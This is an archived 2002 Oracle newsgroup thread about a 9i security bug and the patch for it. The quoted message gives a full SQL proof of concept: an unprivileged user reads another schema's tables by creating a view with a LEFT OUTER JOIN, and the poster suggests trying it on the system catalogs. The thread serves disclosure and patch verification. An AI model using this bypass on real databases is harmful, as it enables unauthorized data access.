Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US

Re: 9iDB Security Hole?

From: Connor McDonald <connor_mcdonald_at_yahoo.com>
Date: Thu, 18 Apr 2002 21:58:22 +0100
Message-ID: <3CBF336E.280B@yahoo.com>


Vladimir M. Zakharychev wrote:
>
> one-off patch for bug 2121935 (ARU:1600347) was put out for 9.0.1.3/Solaris
> yesterday. Anyone with 9.0.1.3/Sol can install it and verify that it closes the
> hole altogether?
>
> --
> Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> All opinions are mine and do not necessarily go in line with those of my employer.
>
> "Vladimir M. Zakharychev" <bob_at_dpsp-yes.com> wrote in message news:a9et5g$9sa$1_at_babylon.agtel.net...
> > Anyone with 9i can confirm this?
> >
> > From: news [mailto:news_at_host.talk.ru] On Behalf Of ...
> > ...relcom.comp.dbms.oracle
> >
> >
> > connect system/****@database
> > CREATE USER us1 IDENTIFIED BY us11 DEFAULT TABLESPACE users TEMPORARY
> > TABLESPACE temp;
> > CREATE USER us2 IDENTIFIED BY us12 DEFAULT TABLESPACE users TEMPORARY
> > TABLESPACE temp;
> > Grant Create Session To us1;
> > Grant Create Session To us2;
> > Grant Create Table To us1;
> > grant unlimited tablespace to us1;
> > Grant Create View To us2;
> >
> > Connect us1/us11_at_database;
> > Create Table t1(c1 Number(1));
> > Insert Into t1(c1) Values(9);
> > Create Table t2(c1 Number(1));
> > Insert Into t2(c1) Values(9);
> >
> > commit;
> > Connect us2/us12_at_database;
> >
> > SQL> Select * From us1.t1;
> > ORA-00942: table or view does not exist
> > -- this is expected
> > SQL> Select * From us1.t2;
> > ORA-00942: table or view does not exist
> > -- this one too
> > SQL> Create View aa As Select * From us1.t1;
> > ORA-00942: table or view does not exist
> > -- and this one
> > SQL> Create View aa As Select t1.c1 As t1_c1, t2.c1 As t2_c1
> > From us1.t1 Left Outer Join us1.t2 On t1.c1 = t2.c1;
> >
> > View created
> > -- now this one is NOT !!!!!
> > SQL> select * from aa;
> >
> > T1_C1 T2_C1
> > ---- ----
> > 9 9
> >
> >
> > This effectively means that LEFT OUTER JOIN allows creating views
> > on tables that are normally not visible (provided that the unprivileged user
> > knows the table and column names).
> > If you can confirm this basic example, can you also try it on system
> > catalog tables/views? If you can not confirm, please specify your version
> > and platform so that we know which ones are not affected (poster didn't
> > specify version, but I suggest it's 9.0.1.1 on either NT or Linux).
> >
> > --
> > Vladimir Zakharychev (bob@dpsp-yes.com) http://www.dpsp-yes.com
> > Dynamic PSP(tm) - the first true RAD toolkit for Oracle-based internet applications.
> > All opinions are mine and do not necessarily go in line with those of my employer.
> >
> >
> >

Yes - plopped onto a machine today and it works fine

Cheers
Connor

-- 
==============================
Connor McDonald

http://www.oracledba.co.uk

"Some days you're the pigeon, some days you're the statue..."
Received on Thu Apr 18 2002 - 15:58:22 CDT
